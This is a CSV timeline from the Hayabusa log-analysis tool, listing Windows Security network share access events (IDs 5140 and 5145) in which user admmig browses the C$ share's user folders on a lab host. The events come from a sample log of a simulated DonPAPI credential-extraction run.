2021-12-12 16:16:05.166 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.166 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.166 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.166 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.166 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.166 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.166 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.181 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.181 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.181 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.181 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.181 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.181 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.198 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.202 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.202 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.202 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.202 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.202 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.202 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.202 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.218 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.218 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.218 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.218 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.218 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.218 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.234 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.234 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.234 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.234 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.234 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.234 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.234 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.249 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.249 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.249 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.249 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.249 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.265 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.268 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.270 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.271 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.271 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.271 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.271 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.271 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.271 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.271 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.286 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.286 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.286 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.286 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.286 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.286 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.286 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.305 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.306 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\baretail - Shortcut.lnk | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.308 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.308 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.323 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.323 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.323 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.323 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.339 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.339 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.339 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\night.bat | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
